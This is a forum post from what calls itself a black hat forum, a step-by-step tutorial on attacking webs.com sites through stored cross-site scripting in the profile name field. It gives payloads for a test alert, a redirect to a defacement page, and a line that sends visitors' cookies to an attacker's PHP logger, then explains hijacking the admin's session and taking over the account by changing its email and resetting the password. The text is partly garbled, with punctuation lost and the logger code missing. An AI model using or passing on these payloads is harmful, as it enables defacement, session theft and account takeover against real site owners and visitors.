Best Black Hat Forum

Full Version: TUT] Hack Any .web.com website
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
PHP Code:
[color=#FFFFFF][b]Hacking Any .webs.com website with Cross Site Scripting! (XSS) 
Things Need While Preforming this attack:
• A VPNSafety First!
• Knowledge of Cross Site Scripting
•A active 
.webs.com website 


Step 1.
Sign up on your webs
.com target website and make any username.

Step 2.
Go to 
"Edit Profile" or anywhere so you can change your name.

The name changing place should look like this:
4606f924066b81a800c7ee5961e7388a.png

Step 3.
Change your username to 
<script>alert("XSS")</script>

Once you've done that visit your profile. When you do you'll see a prompt that pops up and it should say "XSS" depending on what you put in the script.

Step 4.
If you'd like to deface, You will type in <script>window.location="http://LinkToYourDefaceHere.com/"</script>

Once you'
ve saved thatrefresh your profileYou should be redirected to your deface website/page.
To upload your deface just go to Paste HTMLfree HTML hosting and paste your deface source code thereThen where it says "LinkToYourDefaceHere" you'll put your pastehtml link.

Hacking the Admin'
s account

Things Need While Preforming this attack:
• A Cookie Stealing Script
• Knowledge of Cross Site Scripting
•A retarded admin


Step 1.
Go to Free Web Hosting with PHP
MySQL and cPanelNo Ads and make a website or something.

Step 2.
Create 1 file in your websites file manager
Make sure it is a .php file.
The name can be whatever you'd like. For this example we'll put "Bella.php"

Step 3.
Now
inside of Bella.php you need to put the following code:

Step 4.
Now
go to "www.yoursite.com/Bella.php"You should get a blank page.
If 
notit's whatever.
Then you need to go back into your file manager.
If you see "log.txt" the cookie stealing operation worked!
Just go ahead and delete the "log.txt".

Step 5.
Go to your targets website and change your username to:
<script>location.href = '
http://www.yoursite.com/Bella.php?cookie='+document.cookie;</script>

Step 6.
Send your profile link to the admin of the site
.
Once he clicked on it check your File Manager...

You should have a log.txt file.. Inside of it is the admins cookie!!
I don't want to explain it, but look up a tutorial on google on how to switch cookies..

Step 7.
Once you'
ve switched out the cookies you refresh the page and you should be logged into the admin account!

Have fun owning admins!


This isn't only for the admin account.. It'for anyone who clicks on your profile!
Alsoyou can't change the Admin's password because you need there password in order to do so..

sogo to the place where you change your usernameThen click on "Edit Account"
Change the email to YOUR email..
Then sign out and try to re-sign in.. Then click forgot password.
Then you reset the password and you'll have access to the account and the Admin won't!![/b][/color